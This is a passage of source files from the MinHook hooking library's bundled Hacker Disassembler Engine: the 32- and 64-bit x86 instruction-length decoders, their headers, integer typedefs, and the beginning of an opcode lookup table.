ht[ht[opcode / 4] + (opcode % 4)]; 72 | 73 | if (cflags == C_ERROR) { 74 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 75 | cflags = 0; 76 | if ((opcode & -3) == 0x24) 77 | cflags++; 78 | } 79 | 80 | x = 0; 81 | if (cflags & C_GROUP) { 82 | uint16_t t; 83 | t = *(uint16_t *)(ht + (cflags & 0x7f)); 84 | cflags = (uint8_t)t; 85 | x = (uint8_t)(t >> 8); 86 | } 87 | 88 | if (hs->opcode2) { 89 | ht = hde32_table + DELTA_PREFIXES; 90 | if (ht[ht[opcode / 4] + (opcode % 4)] & pref) 91 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 92 | } 93 | 94 | if (cflags & C_MODRM) { 95 | hs->flags |= F_MODRM; 96 | hs->modrm = c = *p++; 97 | hs->modrm_mod = m_mod = c >> 6; 98 | hs->modrm_rm = m_rm = c & 7; 99 | hs->modrm_reg = m_reg = (c & 0x3f) >> 3; 100 | 101 | if (x && ((x << m_reg) & 0x80)) 102 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 103 | 104 | if (!hs->opcode2 && opcode >= 0xd9 && opcode <= 0xdf) { 105 | uint8_t t = opcode - 0xd9; 106 | if (m_mod == 3) { 107 | ht = hde32_table + DELTA_FPU_MODRM + t*8; 108 | t = ht[m_reg] << m_rm; 109 | } else { 110 | ht = hde32_table + DELTA_FPU_REG; 111 | t = ht[t] << m_reg; 112 | } 113 | if (t & 0x80) 114 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 115 | } 116 | 117 | if (pref & PRE_LOCK) { 118 | if (m_mod == 3) { 119 | hs->flags |= F_ERROR | F_ERROR_LOCK; 120 | } else { 121 | uint8_t *table_end, op = opcode; 122 | if (hs->opcode2) { 123 | ht = hde32_table + DELTA_OP2_LOCK_OK; 124 | table_end = ht + DELTA_OP_ONLY_MEM - DELTA_OP2_LOCK_OK; 125 | } else { 126 | ht = hde32_table + DELTA_OP_LOCK_OK; 127 | table_end = ht + DELTA_OP2_LOCK_OK - DELTA_OP_LOCK_OK; 128 | op &= -2; 129 | } 130 | for (; ht != table_end; ht++) 131 | if (*ht++ == op) { 132 | if (!((*ht << m_reg) & 0x80)) 133 | goto no_lock_error; 134 | else 135 | break; 136 | } 137 | hs->flags |= F_ERROR | F_ERROR_LOCK; 138 | no_lock_error: 139 | ; 140 | } 141 | } 142 | 143 | if (hs->opcode2) { 144 | switch (opcode) { 145 | case 0x20: case 0x22: 146 | m_mod = 3; 147 | if (m_reg > 4 || m_reg == 1) 148 | goto error_operand; 149 | else 150 | goto no_error_operand; 151 | case 0x21: case 0x23: 152 | m_mod = 3; 153 | if (m_reg == 4 || m_reg == 5) 154 | goto error_operand; 155 | else 156 | goto no_error_operand; 157 | } 158 | } else { 159 | switch (opcode) { 160 | case 0x8c: 161 | if (m_reg > 5) 162 | goto error_operand; 163 | else 164 | goto no_error_operand; 165 | case 0x8e: 166 | if (m_reg == 1 || m_reg > 5) 167 | goto error_operand; 168 | else 169 | goto no_error_operand; 170 | } 171 | } 172 | 173 | if (m_mod == 3) { 174 | uint8_t *table_end; 175 | if (hs->opcode2) { 176 | ht = hde32_table + DELTA_OP2_ONLY_MEM; 177 | table_end = ht + sizeof(hde32_table) - DELTA_OP2_ONLY_MEM; 178 | } else { 179 | ht = hde32_table + DELTA_OP_ONLY_MEM; 180 | table_end = ht + DELTA_OP2_ONLY_MEM - DELTA_OP_ONLY_MEM; 181 | } 182 | for (; ht != table_end; ht += 2) 183 | if (*ht++ == opcode) { 184 | if (*ht++ & pref && !((*ht << m_reg) & 0x80)) 185 | goto error_operand; 186 | else 187 | break; 188 | } 189 | goto no_error_operand; 190 | } else if (hs->opcode2) { 191 | switch (opcode) { 192 | case 0x50: case 0xd7: case 0xf7: 193 | if (pref & (PRE_NONE | PRE_66)) 194 | goto error_operand; 195 | break; 196 | case 0xd6: 197 | if (pref & (PRE_F2 | PRE_F3)) 198 | goto error_operand; 199 | break; 200 | case 0xc5: 201 | goto error_operand; 202 | } 203 | goto no_error_operand; 204 | } else 205 | goto no_error_operand; 206 | 207 | error_operand: 208 | hs->flags |= F_ERROR | F_ERROR_OPERAND; 209 | no_error_operand: 210 | 211 | c = *p++; 212 | if (m_reg <= 1) { 213 | if (opcode == 0xf6) 214 | cflags |= C_IMM8; 215 | else if (opcode == 0xf7) 216 | cflags |= C_IMM_P66; 217 | } 218 | 219 | switch (m_mod) { 220 | case 0: 221 | if (pref & PRE_67) { 222 | if (m_rm == 6) 223 | disp_size = 2; 224 | } else 225 | if (m_rm == 5) 226 | disp_size = 4; 227 | break; 228 | case 1: 229 | disp_size = 1; 230 | break; 231 | case 2: 232 | disp_size = 2; 233 | if (!(pref & PRE_67)) 234 | disp_size <<= 1; 235 | } 236 | 237 | if (m_mod != 3 && m_rm == 4 && !(pref & PRE_67)) { 238 | hs->flags |= F_SIB; 239 | p++; 240 | hs->sib = c; 241 | hs->sib_scale = c >> 6; 242 | hs->sib_index = (c & 0x3f) >> 3; 243 | if ((hs->sib_base = c & 7) == 5 && !(m_mod & 1)) 244 | disp_size = 4; 245 | } 246 | 247 | p--; 248 | switch (disp_size) { 249 | case 1: 250 | hs->flags |= F_DISP8; 251 | hs->disp.disp8 = *p; 252 | break; 253 | case 2: 254 | hs->flags |= F_DISP16; 255 | hs->disp.disp16 = *(uint16_t *)p; 256 | break; 257 | case 4: 258 | hs->flags |= F_DISP32; 259 | hs->disp.disp32 = *(uint32_t *)p; 260 | } 261 | p += disp_size; 262 | } else if (pref & PRE_LOCK) 263 | hs->flags |= F_ERROR | F_ERROR_LOCK; 264 | 265 | if (cflags & C_IMM_P66) { 266 | if (cflags & C_REL32) { 267 | if (pref & PRE_66) { 268 | hs->flags |= F_IMM16 | F_RELATIVE; 269 | hs->imm.imm16 = *(uint16_t *)p; 270 | p += 2; 271 | goto disasm_done; 272 | } 273 | goto rel32_ok; 274 | } 275 | if (pref & PRE_66) { 276 | hs->flags |= F_IMM16; 277 | hs->imm.imm16 = *(uint16_t *)p; 278 | p += 2; 279 | } else { 280 | hs->flags |= F_IMM32; 281 | hs->imm.imm32 = *(uint32_t *)p; 282 | p += 4; 283 | } 284 | } 285 | 286 | if (cflags & C_IMM16) { 287 | if (hs->flags & F_IMM32) { 288 | hs->flags |= F_IMM16; 289 | hs->disp.disp16 = *(uint16_t *)p; 290 | } else if (hs->flags & F_IMM16) { 291 | hs->flags |= F_2IMM16; 292 | hs->disp.disp16 = *(uint16_t *)p; 293 | } else { 294 | hs->flags |= F_IMM16; 295 | hs->imm.imm16 = *(uint16_t *)p; 296 | } 297 | p += 2; 298 | } 299 | if (cflags & C_IMM8) { 300 | hs->flags |= F_IMM8; 301 | hs->imm.imm8 = *p++; 302 | } 303 | 304 | if (cflags & C_REL32) { 305 | rel32_ok: 306 | hs->flags |= F_IMM32 | F_RELATIVE; 307 | hs->imm.imm32 = *(uint32_t *)p; 308 | p += 4; 309 | } else if (cflags & C_REL8) { 310 | hs->flags |= F_IMM8 | F_RELATIVE; 311 | hs->imm.imm8 = *p++; 312 | } 313 | 314 | disasm_done: 315 | 316 | if ((hs->len = (uint8_t)(p-(uint8_t *)code)) > 15) { 317 | hs->flags |= F_ERROR | F_ERROR_LENGTH; 318 | hs->len = 15; 319 | } 320 | 321 | return (unsigned int)hs->len; 322 | } 323 | -------------------------------------------------------------------------------- /MinHook/src/hde/hde32.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Hacker Disassembler Engine 32 3 | * Copyright (c) 2006-2009, Vyacheslav Patkov. 4 | * All rights reserved. 5 | * 6 | * hde32.h: C/C++ header file 7 | * 8 | */ 9 | 10 | #ifndef _HDE32_H_ 11 | #define _HDE32_H_ 12 | 13 | /* stdint.h - C99 standard header 14 | * http://en.wikipedia.org/wiki/stdint.h 15 | * 16 | * if your compiler doesn't contain "stdint.h" header (for 17 | * example, Microsoft Visual C++), you can download file: 18 | * http://www.azillionmonkeys.com/qed/pstdint.h 19 | * and change next line to: 20 | * #include "pstdint.h" 21 | */ 22 | #include "pstdint.h" 23 | 24 | #define F_MODRM 0x00000001 25 | #define F_SIB 0x00000002 26 | #define F_IMM8 0x00000004 27 | #define F_IMM16 0x00000008 28 | #define F_IMM32 0x00000010 29 | #define F_DISP8 0x00000020 30 | #define F_DISP16 0x00000040 31 | #define F_DISP32 0x00000080 32 | #define F_RELATIVE 0x00000100 33 | #define F_2IMM16 0x00000800 34 | #define F_ERROR 0x00001000 35 | #define F_ERROR_OPCODE 0x00002000 36 | #define F_ERROR_LENGTH 0x00004000 37 | #define F_ERROR_LOCK 0x00008000 38 | #define F_ERROR_OPERAND 0x00010000 39 | #define F_PREFIX_REPNZ 0x01000000 40 | #define F_PREFIX_REPX 0x02000000 41 | #define F_PREFIX_REP 0x03000000 42 | #define F_PREFIX_66 0x04000000 43 | #define F_PREFIX_67 0x08000000 44 | #define F_PREFIX_LOCK 0x10000000 45 | #define F_PREFIX_SEG 0x20000000 46 | #define F_PREFIX_ANY 0x3f000000 47 | 48 | #define PREFIX_SEGMENT_CS 0x2e 49 | #define PREFIX_SEGMENT_SS 0x36 50 | #define PREFIX_SEGMENT_DS 0x3e 51 | #define PREFIX_SEGMENT_ES 0x26 52 | #define PREFIX_SEGMENT_FS 0x64 53 | #define PREFIX_SEGMENT_GS 0x65 54 | #define PREFIX_LOCK 0xf0 55 | #define PREFIX_REPNZ 0xf2 56 | #define PREFIX_REPX 0xf3 57 | #define PREFIX_OPERAND_SIZE 0x66 58 | #define PREFIX_ADDRESS_SIZE 0x67 59 | 60 | #pragma pack(push,1) 61 | 62 | typedef struct { 63 | uint8_t len; 64 | uint8_t p_rep; 65 | uint8_t p_lock; 66 | uint8_t p_seg; 67 | uint8_t p_66; 68 | uint8_t p_67; 69 | uint8_t opcode; 70 | uint8_t opcode2; 71 | uint8_t modrm; 72 | uint8_t modrm_mod; 73 | uint8_t modrm_reg; 74 | uint8_t modrm_rm; 75 | uint8_t sib; 76 | uint8_t sib_scale; 77 | uint8_t sib_index; 78 | uint8_t sib_base; 79 | union { 80 | uint8_t imm8; 81 | uint16_t imm16; 82 | uint32_t imm32; 83 | } imm; 84 | union { 85 | uint8_t disp8; 86 | uint16_t disp16; 87 | uint32_t disp32; 88 | } disp; 89 | uint32_t flags; 90 | } hde32s; 91 | 92 | #pragma pack(pop) 93 | 94 | #ifdef __cplusplus 95 | extern "C" { 96 | #endif 97 | 98 | /* __cdecl */ 99 | unsigned int hde32_disasm(const void *code, hde32s *hs); 100 | 101 | #ifdef __cplusplus 102 | } 103 | #endif 104 | 105 | #endif /* _HDE32_H_ */ 106 | -------------------------------------------------------------------------------- /MinHook/src/hde/hde64.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Hacker Disassembler Engine 64 C 3 | * Copyright (c) 2008-2009, Vyacheslav Patkov. 4 | * All rights reserved. 5 | * 6 | */ 7 | 8 | #include "hde64.h" 9 | #include "table64.h" 10 | 11 | unsigned int hde64_disasm(const void *code, hde64s *hs) 12 | { 13 | uint8_t x, c, *p = (uint8_t *)code, cflags, opcode, pref = 0; 14 | uint8_t *ht = hde64_table, m_mod, m_reg, m_rm, disp_size = 0; 15 | uint8_t op64 = 0; 16 | 17 | // Avoid using memset to reduce the footprint. 18 | #ifndef _MSC_VER 19 | memset((LPBYTE)hs, 0, sizeof(hde64s)); 20 | #else 21 | __stosb((LPBYTE)hs, 0, sizeof(hde64s)); 22 | #endif 23 | 24 | for (x = 16; x; x--) 25 | switch (c = *p++) { 26 | case 0xf3: 27 | hs->p_rep = c; 28 | pref |= PRE_F3; 29 | break; 30 | case 0xf2: 31 | hs->p_rep = c; 32 | pref |= PRE_F2; 33 | break; 34 | case 0xf0: 35 | hs->p_lock = c; 36 | pref |= PRE_LOCK; 37 | break; 38 | case 0x26: case 0x2e: case 0x36: 39 | case 0x3e: case 0x64: case 0x65: 40 | hs->p_seg = c; 41 | pref |= PRE_SEG; 42 | break; 43 | case 0x66: 44 | hs->p_66 = c; 45 | pref |= PRE_66; 46 | break; 47 | case 0x67: 48 | hs->p_67 = c; 49 | pref |= PRE_67; 50 | break; 51 | default: 52 | goto pref_done; 53 | } 54 | pref_done: 55 | 56 | hs->flags = (uint32_t)pref << 23; 57 | 58 | if (!pref) 59 | pref |= PRE_NONE; 60 | 61 | if ((c & 0xf0) == 0x40) { 62 | hs->flags |= F_PREFIX_REX; 63 | if ((hs->rex_w = (c & 0xf) >> 3) && (*p & 0xf8) == 0xb8) 64 | op64++; 65 | hs->rex_r = (c & 7) >> 2; 66 | hs->rex_x = (c & 3) >> 1; 67 | hs->rex_b = c & 1; 68 | if (((c = *p++) & 0xf0) == 0x40) { 69 | opcode = c; 70 | goto error_opcode; 71 | } 72 | } 73 | 74 | if ((hs->opcode = c) == 0x0f) { 75 | hs->opcode2 = c = *p++; 76 | ht += DELTA_OPCODES; 77 | } else if (c >= 0xa0 && c <= 0xa3) { 78 | op64++; 79 | if (pref & PRE_67) 80 | pref |= PRE_66; 81 | else 82 | pref &= ~PRE_66; 83 | } 84 | 85 | opcode = c; 86 | cflags = ht[ht[opcode / 4] + (opcode % 4)]; 87 | 88 | if (cflags == C_ERROR) { 89 | error_opcode: 90 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 91 | cflags = 0; 92 | if ((opcode & -3) == 0x24) 93 | cflags++; 94 | } 95 | 96 | x = 0; 97 | if (cflags & C_GROUP) { 98 | uint16_t t; 99 | t = *(uint16_t *)(ht + (cflags & 0x7f)); 100 | cflags = (uint8_t)t; 101 | x = (uint8_t)(t >> 8); 102 | } 103 | 104 | if (hs->opcode2) { 105 | ht = hde64_table + DELTA_PREFIXES; 106 | if (ht[ht[opcode / 4] + (opcode % 4)] & pref) 107 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 108 | } 109 | 110 | if (cflags & C_MODRM) { 111 | hs->flags |= F_MODRM; 112 | hs->modrm = c = *p++; 113 | hs->modrm_mod = m_mod = c >> 6; 114 | hs->modrm_rm = m_rm = c & 7; 115 | hs->modrm_reg = m_reg = (c & 0x3f) >> 3; 116 | 117 | if (x && ((x << m_reg) & 0x80)) 118 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 119 | 120 | if (!hs->opcode2 && opcode >= 0xd9 && opcode <= 0xdf) { 121 | uint8_t t = opcode - 0xd9; 122 | if (m_mod == 3) { 123 | ht = hde64_table + DELTA_FPU_MODRM + t*8; 124 | t = ht[m_reg] << m_rm; 125 | } else { 126 | ht = hde64_table + DELTA_FPU_REG; 127 | t = ht[t] << m_reg; 128 | } 129 | if (t & 0x80) 130 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 131 | } 132 | 133 | if (pref & PRE_LOCK) { 134 | if (m_mod == 3) { 135 | hs->flags |= F_ERROR | F_ERROR_LOCK; 136 | } else { 137 | uint8_t *table_end, op = opcode; 138 | if (hs->opcode2) { 139 | ht = hde64_table + DELTA_OP2_LOCK_OK; 140 | table_end = ht + DELTA_OP_ONLY_MEM - DELTA_OP2_LOCK_OK; 141 | } else { 142 | ht = hde64_table + DELTA_OP_LOCK_OK; 143 | table_end = ht + DELTA_OP2_LOCK_OK - DELTA_OP_LOCK_OK; 144 | op &= -2; 145 | } 146 | for (; ht != table_end; ht++) 147 | if (*ht++ == op) { 148 | if (!((*ht << m_reg) & 0x80)) 149 | goto no_lock_error; 150 | else 151 | break; 152 | } 153 | hs->flags |= F_ERROR | F_ERROR_LOCK; 154 | no_lock_error: 155 | ; 156 | } 157 | } 158 | 159 | if (hs->opcode2) { 160 | switch (opcode) { 161 | case 0x20: case 0x22: 162 | m_mod = 3; 163 | if (m_reg > 4 || m_reg == 1) 164 | goto error_operand; 165 | else 166 | goto no_error_operand; 167 | case 0x21: case 0x23: 168 | m_mod = 3; 169 | if (m_reg == 4 || m_reg == 5) 170 | goto error_operand; 171 | else 172 | goto no_error_operand; 173 | } 174 | } else { 175 | switch (opcode) { 176 | case 0x8c: 177 | if (m_reg > 5) 178 | goto error_operand; 179 | else 180 | goto no_error_operand; 181 | case 0x8e: 182 | if (m_reg == 1 || m_reg > 5) 183 | goto error_operand; 184 | else 185 | goto no_error_operand; 186 | } 187 | } 188 | 189 | if (m_mod == 3) { 190 | uint8_t *table_end; 191 | if (hs->opcode2) { 192 | ht = hde64_table + DELTA_OP2_ONLY_MEM; 193 | table_end = ht + sizeof(hde64_table) - DELTA_OP2_ONLY_MEM; 194 | } else { 195 | ht = hde64_table + DELTA_OP_ONLY_MEM; 196 | table_end = ht + DELTA_OP2_ONLY_MEM - DELTA_OP_ONLY_MEM; 197 | } 198 | for (; ht != table_end; ht += 2) 199 | if (*ht++ == opcode) { 200 | if (*ht++ & pref && !((*ht << m_reg) & 0x80)) 201 | goto error_operand; 202 | else 203 | break; 204 | } 205 | goto no_error_operand; 206 | } else if (hs->opcode2) { 207 | switch (opcode) { 208 | case 0x50: case 0xd7: case 0xf7: 209 | if (pref & (PRE_NONE | PRE_66)) 210 | goto error_operand; 211 | break; 212 | case 0xd6: 213 | if (pref & (PRE_F2 | PRE_F3)) 214 | goto error_operand; 215 | break; 216 | case 0xc5: 217 | goto error_operand; 218 | } 219 | goto no_error_operand; 220 | } else 221 | goto no_error_operand; 222 | 223 | error_operand: 224 | hs->flags |= F_ERROR | F_ERROR_OPERAND; 225 | no_error_operand: 226 | 227 | c = *p++; 228 | if (m_reg <= 1) { 229 | if (opcode == 0xf6) 230 | cflags |= C_IMM8; 231 | else if (opcode == 0xf7) 232 | cflags |= C_IMM_P66; 233 | } 234 | 235 | switch (m_mod) { 236 | case 0: 237 | if (pref & PRE_67) { 238 | if (m_rm == 6) 239 | disp_size = 2; 240 | } else 241 | if (m_rm == 5) 242 | disp_size = 4; 243 | break; 244 | case 1: 245 | disp_size = 1; 246 | break; 247 | case 2: 248 | disp_size = 2; 249 | if (!(pref & PRE_67)) 250 | disp_size <<= 1; 251 | } 252 | 253 | if (m_mod != 3 && m_rm == 4) { 254 | hs->flags |= F_SIB; 255 | p++; 256 | hs->sib = c; 257 | hs->sib_scale = c >> 6; 258 | hs->sib_index = (c & 0x3f) >> 3; 259 | if ((hs->sib_base = c & 7) == 5 && !(m_mod & 1)) 260 | disp_size = 4; 261 | } 262 | 263 | p--; 264 | switch (disp_size) { 265 | case 1: 266 | hs->flags |= F_DISP8; 267 | hs->disp.disp8 = *p; 268 | break; 269 | case 2: 270 | hs->flags |= F_DISP16; 271 | hs->disp.disp16 = *(uint16_t *)p; 272 | break; 273 | case 4: 274 | hs->flags |= F_DISP32; 275 | hs->disp.disp32 = *(uint32_t *)p; 276 | } 277 | p += disp_size; 278 | } else if (pref & PRE_LOCK) 279 | hs->flags |= F_ERROR | F_ERROR_LOCK; 280 | 281 | if (cflags & C_IMM_P66) { 282 | if (cflags & C_REL32) { 283 | if (pref & PRE_66) { 284 | hs->flags |= F_IMM16 | F_RELATIVE; 285 | hs->imm.imm16 = *(uint16_t *)p; 286 | p += 2; 287 | goto disasm_done; 288 | } 289 | goto rel32_ok; 290 | } 291 | if (op64) { 292 | hs->flags |= F_IMM64; 293 | hs->imm.imm64 = *(uint64_t *)p; 294 | p += 8; 295 | } else if (!(pref & PRE_66)) { 296 | hs->flags |= F_IMM32; 297 | hs->imm.imm32 = *(uint32_t *)p; 298 | p += 4; 299 | } else 300 | goto imm16_ok; 301 | } 302 | 303 | 304 | if (cflags & C_IMM16) { 305 | imm16_ok: 306 | hs->flags |= F_IMM16; 307 | hs->imm.imm16 = *(uint16_t *)p; 308 | p += 2; 309 | } 310 | if (cflags & C_IMM8) { 311 | hs->flags |= F_IMM8; 312 | hs->imm.imm8 = *p++; 313 | } 314 | 315 | if (cflags & C_REL32) { 316 | rel32_ok: 317 | hs->flags |= F_IMM32 | F_RELATIVE; 318 | hs->imm.imm32 = *(uint32_t *)p; 319 | p += 4; 320 | } else if (cflags & C_REL8) { 321 | hs->flags |= F_IMM8 | F_RELATIVE; 322 | hs->imm.imm8 = *p++; 323 | } 324 | 325 | disasm_done: 326 | 327 | if ((hs->len = (uint8_t)(p-(uint8_t *)code)) > 15) { 328 | hs->flags |= F_ERROR | F_ERROR_LENGTH; 329 | hs->len = 15; 330 | } 331 | 332 | return (unsigned int)hs->len; 333 | } 334 | -------------------------------------------------------------------------------- /MinHook/src/hde/hde64.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Hacker Disassembler Engine 64 3 | * Copyright (c) 2008-2009, Vyacheslav Patkov. 4 | * All rights reserved. 5 | * 6 | * hde64.h: C/C++ header file 7 | * 8 | */ 9 | 10 | #ifndef _HDE64_H_ 11 | #define _HDE64_H_ 12 | 13 | /* stdint.h - C99 standard header 14 | * http://en.wikipedia.org/wiki/stdint.h 15 | * 16 | * if your compiler doesn't contain "stdint.h" header (for 17 | * example, Microsoft Visual C++), you can download file: 18 | * http://www.azillionmonkeys.com/qed/pstdint.h 19 | * and change next line to: 20 | * #include "pstdint.h" 21 | */ 22 | #include "pstdint.h" 23 | 24 | #define F_MODRM 0x00000001 25 | #define F_SIB 0x00000002 26 | #define F_IMM8 0x00000004 27 | #define F_IMM16 0x00000008 28 | #define F_IMM32 0x00000010 29 | #define F_IMM64 0x00000020 30 | #define F_DISP8 0x00000040 31 | #define F_DISP16 0x00000080 32 | #define F_DISP32 0x00000100 33 | #define F_RELATIVE 0x00000200 34 | #define F_ERROR 0x00001000 35 | #define F_ERROR_OPCODE 0x00002000 36 | #define F_ERROR_LENGTH 0x00004000 37 | #define F_ERROR_LOCK 0x00008000 38 | #define F_ERROR_OPERAND 0x00010000 39 | #define F_PREFIX_REPNZ 0x01000000 40 | #define F_PREFIX_REPX 0x02000000 41 | #define F_PREFIX_REP 0x03000000 42 | #define F_PREFIX_66 0x04000000 43 | #define F_PREFIX_67 0x08000000 44 | #define F_PREFIX_LOCK 0x10000000 45 | #define F_PREFIX_SEG 0x20000000 46 | #define F_PREFIX_REX 0x40000000 47 | #define F_PREFIX_ANY 0x7f000000 48 | 49 | #define PREFIX_SEGMENT_CS 0x2e 50 | #define PREFIX_SEGMENT_SS 0x36 51 | #define PREFIX_SEGMENT_DS 0x3e 52 | #define PREFIX_SEGMENT_ES 0x26 53 | #define PREFIX_SEGMENT_FS 0x64 54 | #define PREFIX_SEGMENT_GS 0x65 55 | #define PREFIX_LOCK 0xf0 56 | #define PREFIX_REPNZ 0xf2 57 | #define PREFIX_REPX 0xf3 58 | #define PREFIX_OPERAND_SIZE 0x66 59 | #define PREFIX_ADDRESS_SIZE 0x67 60 | 61 | #pragma pack(push,1) 62 | 63 | typedef struct { 64 | uint8_t len; 65 | uint8_t p_rep; 66 | uint8_t p_lock; 67 | uint8_t p_seg; 68 | uint8_t p_66; 69 | uint8_t p_67; 70 | uint8_t rex; 71 | uint8_t rex_w; 72 | uint8_t rex_r; 73 | uint8_t rex_x; 74 | uint8_t rex_b; 75 | uint8_t opcode; 76 | uint8_t opcode2; 77 | uint8_t modrm; 78 | uint8_t modrm_mod; 79 | uint8_t modrm_reg; 80 | uint8_t modrm_rm; 81 | uint8_t sib; 82 | uint8_t sib_scale; 83 | uint8_t sib_index; 84 | uint8_t sib_base; 85 | union { 86 | uint8_t imm8; 87 | uint16_t imm16; 88 | uint32_t imm32; 89 | uint64_t imm64; 90 | } imm; 91 | union { 92 | uint8_t disp8; 93 | uint16_t disp16; 94 | uint32_t disp32; 95 | } disp; 96 | uint32_t flags; 97 | } hde64s; 98 | 99 | #pragma pack(pop) 100 | 101 | #ifdef __cplusplus 102 | extern "C" { 103 | #endif 104 | 105 | /* __cdecl */ 106 | unsigned int hde64_disasm(const void *code, hde64s *hs); 107 | 108 | #ifdef __cplusplus 109 | } 110 | #endif 111 | 112 | #endif /* _HDE64_H_ */ 113 | -------------------------------------------------------------------------------- /MinHook/src/hde/pstdint.h: -------------------------------------------------------------------------------- 1 | /* 2 | * MinHook - The Minimalistic API Hooking Library for x64/x86 3 | * Copyright (C) 2009-2016 Tsuda Kageyu. All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions 7 | * are met: 8 | * 9 | * 1. Redistributions of source code must retain the above copyright 10 | * notice, this list of conditions and the following disclaimer. 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR 16 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 17 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 18 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 19 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 20 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 21 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 22 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 23 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 24 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 25 | */ 26 | 27 | #pragma once 28 | 29 | #include 30 | 31 | // Integer types for HDE. 32 | typedef INT8 int8_t; 33 | typedef INT16 int16_t; 34 | typedef INT32 int32_t; 35 | typedef INT64 int64_t; 36 | typedef UINT8 uint8_t; 37 | typedef UINT16 uint16_t; 38 | typedef UINT32 uint32_t; 39 | typedef UINT64 uint64_t; 40 | -------------------------------------------------------------------------------- /MinHook/src/hde/table32.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Hacker Disassembler Engine 32 C 3 | * Copyright (c) 2008-2009, Vyacheslav Patkov. 4 | * All rights reserved. 5 | * 6 | */ 7 | 8 | #define C_NONE 0x00 9 | #define C_MODRM 0x01 10 | #define C_IMM8 0x02 11 | #define C_IMM16 0x04 12 | #define C_IMM_P66 0x10 13 | #define C_REL8 0x20 14 | #define C_REL32 0x40 15 | #define C_GROUP 0x80 16 | #define C_ERROR 0xff 17 | 18 | #define PRE_ANY 0x00 19 | #define PRE_NONE 0x01 20 | #define PRE_F2 0x02 21 | #define PRE_F3 0x04 22 | #define PRE_66 0x08 23 | #define PRE_67 0x10 24 | #define PRE_LOCK 0x20 25 | #define PRE_SEG 0x40 26 | #define PRE_ALL 0xff 27 | 28 | #define DELTA_OPCODES 0x4a 29 | #define DELTA_FPU_REG 0xf1 30 | #define DELTA_FPU_MODRM 0xf8 31 | #define DELTA_PREFIXES 0x130 32 | #define DELTA_OP_LOCK_OK 0x1a1 33 | #define DELTA_OP2_LOCK_OK 0x1b9 34 | #define DELTA_OP_ONLY_MEM 0x1cb 35 | #define DELTA_OP2_ONLY_MEM 0x1da 36 | 37 | unsigned char hde32_table[] = { 38 | 0xa3,0xa8,0xa3,0xa8,0xa3,0xa8,0xa3,0xa8,0xa3,0xa8,0xa3,0xa8,0xa3,0xa8,0xa3, 39 | 0xa8,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xac,0xaa,0xb2,0xaa,0x9f,0x9f, 40 | 0x9f,0x9f,0xb5,0xa3,0xa3,0xa4,0xaa,0xaa,0xba,0xaa,0x96,0xaa,0xa8,0xaa,0xc3, 41 | 0xc3,0x96,0x96,0xb7,0xae,0xd6,0xbd,0xa3,0xc5,0xa3,0xa3,0x9f,0xc3,0x9c,0xaa, 42 | 0xaa,0xac,0xaa,0xbf,0x03,0x7f,0x11,0x7f,0x01,0x7f,0x01,0x3f,0x01,0x01,0x90, 43 | 0x82,0x7d,0x97,0x59,0x59,0x59,0x59,0x59,0x7f,0x59,0x59,0x60,0x7d,0x7f,0x7f, 44 | 0x59,0x59,0x59,0x59,0x59,0x59,0x59,0x59,0x59,0x59,0x59,0x59,0x9a,0x88,0x7d, 45 | 0x59,0x50,0x50,0x50,0x50,0x59,0x59,0x59,0x59,0x61,0x94,0x61,0x9e,0x59,0x59, 46 | 0x85,0x59,0x92,0xa3,0x60,0x60,0x59,0x59,0x59,0x59,0x59,0x59,0x59,0x59,0x59, 47 | 0x59,0x59,0x9f,0x01,0x03,0x01,0x04,0x03,0xd5,0x03,0xcc,0x01,0xbc,0x03,0xf0, 48 | 0x10,0x10,0x10,0x10,0x50,0x50,0x50,0x50,0x14,0x20,0x20,0x20,0x20,0x01,0x01, 49 | 0x01,0x01,0xc4,0x02,0x10,0x00,0x00,0x00,0x00,0x01,0x01,0xc0,0xc2,0x10,0x11, 50 | 0x02,0x03,0x11,0x03,0x03,0x04,0x00,0x00,0x14,0x00,0x02,0x00,0x00,0xc6,0xc8, 51 | 0x02,0x02,0x02,0x02,0x00,0x00,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0xff,0xca, 52 | 0x01,0x01,0x01,0x00,0x06,0x00,0x04,0x00,0xc0,0xc2,0x01,0x01,0x03,0x01,0xff, 53 | 0xff,0x01,0x00,0x03,0xc4,0xc4,0xc6,0x03,0x01,0x01,0x01,0xff,0x03,0x03,0x03, 54 | 0xc8,0x40,0x00,0x0a,0x00,0x04,0x00,0x00,0x00,0x00,0x7f,0x00,0x33,0x01,0x00, 55 | 0x00,0x00,0x00,0x00,0x00,0xff,0xbf,0xff,0xff,0x00,0x00,0x00,0x00,0x07,0x00, 56 | 